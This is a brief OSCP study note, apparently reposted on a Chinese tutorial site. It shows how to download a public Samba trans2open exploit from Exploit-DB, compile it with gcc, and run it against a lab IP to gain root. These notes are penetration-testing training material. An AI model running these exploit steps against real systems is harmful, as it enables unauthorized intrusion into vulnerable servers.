OSCP Learning Notes - Exploit(2)

这一生的挚爱 提交于 2020-03-15 09:20:36

Compiling an Exploit

Exercise: samba exploit

1. Search and download the samba exploit source code from Exploit Database.

https://www.exploit-db.com/exploits/10

2. Compile the source code.

gcc 10.c -o trans2open

 

 

3. Use the trans2open tool to exploit the target server. Root the target server sucessfully.

 

./trans2open -b 0 10.0.0.20

 

 

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!